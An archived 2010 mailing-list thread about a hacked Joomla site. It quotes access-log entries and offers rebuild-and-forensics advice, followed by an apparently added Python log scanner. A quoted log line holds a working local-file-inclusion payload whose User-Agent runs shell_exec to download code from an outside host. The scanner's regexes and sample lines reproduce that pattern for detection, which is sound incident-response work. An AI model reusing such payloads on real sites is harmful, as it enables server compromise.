[thelist] block phishing
John List
johnlist at gulfbridge.net
Sun Mar 28 14:18:20 CDT 2010
On 03/28/2010 12:20 PM, Bob Meetin wrote:
> I got a notice that one of my sites got hit yesterday, so I logged in,
> and identified the file mentioned, also found a couple php files that
> got dropped into webhome that were related. I moved the files into an
> out of webroot folder for future scrutinization, then checked the
> server access log, found a number of entries at the approximate date
> stamp of the uploaded files that seemed to be related.
>
> I am methodically going through the system looking for anything not
> locked down. What I could use some help with is understanding if the
> access log entries are associated and how to lock out the intruders.
> As IP addresses change I suspect it's more than simply editing the
> robots.txt or adding a line in the .htaccess.
Bob,
I'm a long time subscriber to this list but don't read all the posts so
pardon me if I'm missing some context here. My impression is this:
* You say you "got a notice" that one of your sites has been "hit"
  and you have identified the "file mentioned". From that and your
  post's subject I infer that you mean that someone notified you
  that your site is hosting a phishing exploit.
* Your reaction so far is to look at the web log and consider
  tweaking your web configuration.
My reaction is that you are taking this far too lightly. The fact that
someone else has, without your knowledge, placed files on your system
indicates that your system had a vulnerability and is now compromised.
You should therefore take your system off line and rebuild it from
scratch using backups.
To prevent such an exploit on your rebuilt system, you should do some
forensics on the current system's disk before wiping it to determine how
someone gained access. (Hint: The compromise occurred before the post of
/fat.php but it has nothing to do with baidu.com or its spider.)
I am not familiar with Joomla's vulnerabilities, but if you suspect the
intruder came via the web, then I'd recommend you do an inquiry on a
Joomla list. Otherwise, you shouldn't rule out an intrusion through ftp or
ssh. So you need to check all your logs, not just your web log. (But a
sophisticated attack will cover its tracks by altering the logs so you
may never know.)
But even if you determine how they did this, you don't know how much
damage they did. That's why it's important to rebuild your system.
Good luck,
John
> Some of the suspicious entries look like:
>
> 123.125.66.72 - - [27/Mar/2010:18:58:09 -0500] "GET / HTTP/1.1" 200
> 18076 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
>
> 83.229.80.30 - - [27/Mar/2010:18:58:41 -0500] "POST /fat.php HTTP/1.1"
> 200 8015 "http://www.$websitename/fat.php" "Mozilla/5.0 (Windows; U;
> Windows NT 6.0; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET
> CLR 3.5.30729)"
>
> fat.php was one of the deposited files. 18:58 was the datestamp.
>
> 75.125.130.100 - - [27/Mar/2010:22:25:47 -0500] "GET
> /administrator/host.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"
>
> Related? There is nothing (current) in the filesystem called host.php
>
> 80.246.53.20 - - [27/Mar/2010:22:25:41 -0500] "GET
> /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00%0F
> HTTP/1.1" 200 1423 "-" "<? shell_exec('lwp-download
> http://immortal-killaz.servercamp.de/fanatix/tv.txt;mv tv.txt
> print_out.php');?>"
>
> com_sectionex is a Joomla component. There is also no legitimate file
> called print_out.php, but I found one.
>
> 75.125.130.100 - - [27/Mar/2010:22:25:48 -0500] "GET
> /administrator/hr57.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"
>
> Suggestions for robots.txt:
>
> #Baiduspider
> User-agent: Baiduspider
> Disallow: /
>
> #Others
> User-agent: *
> Disallow: /
>
> Suggestions for .htaccess:
>
> <Files *.*>
> order allow,deny
> allow from all
> deny from 220.181.
> </Files>
>
> -Bob
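As an added illustration of John's point that the web log has to be read for the intrusion vector rather than the crawler noise, here is a small Python scanner (example code written for this archive page, not from the thread or from Joomla) that parses Apache combined-format lines and flags the pattern visible in the quoted com_sectionex entry: a traversal sequence aimed at /proc/self/environ, a null byte, and PHP code in the User-Agent. The sample lines are constructed to resemble the thread's entries, with documentation-range IPs and a placeholder download host.

```python
import re
from urllib.parse import unquote

# Apache combined log format, the layout of the entries quoted in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>.*)"$')

# Indicators of the LFI pattern in the quoted entries: traversal to
# /proc/self/environ, a null byte, and PHP in the User-Agent (which environ echoes).
INDICATORS = {
    "traversal": re.compile(r"(\.\./){3,}"),
    "proc_environ": re.compile(r"/proc/self/environ"),
    "null_byte": re.compile("\x00"),
    "php_in_ua": re.compile(r"<\?|shell_exec|lwp-download|wget |curl "),
}

# Constructed sample lines modelled on the thread (documentation IPs, placeholder host).
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Mar/2010:18:58:09 -0500] "GET / HTTP/1.1" 200 18076 '
    '"-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"',
    '198.51.100.7 - - [27/Mar/2010:22:25:41 -0500] "GET /index.php?option=com_sectionex'
    '&controller=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1423 "-" '
    '"<? shell_exec(\'lwp-download http://example.invalid/tv.txt;mv tv.txt x.php\');?>"',
    '198.51.100.8 - - [27/Mar/2010:22:25:48 -0500] "GET /administrator/hr57.php '
    'HTTP/1.0" 200 73956 "-" "\\"Mozilla/4.0"',
]

def parse(line):
    """Split one combined-format line into named fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def flag(entry):
    """Return the names of the indicators matched by one parsed entry."""
    path = unquote(entry["path"])  # decode %2e, %00 etc. before matching
    hits = [n for n in ("traversal", "proc_environ", "null_byte")
            if INDICATORS[n].search(path)]
    if INDICATORS["php_in_ua"].search(entry["ua"]):
        hits.append("php_in_ua")
    return hits

def scan(lines):
    """Return (ip, path, hits) for every line matching at least one indicator."""
    findings = []
    for entry in filter(None, map(parse, lines)):
        hits = flag(entry)
        if hits:
            findings.append((entry["ip"], entry["path"], hits))
    return findings
```

Run it over a real access_log with `scan(open("access_log"))` and the crawler hit drops out while the traversal request and its source address are reported; the later GETs for dropped files (host.php, hr57.php) still need a filesystem check, as the thread notes, because their log lines look ordinary.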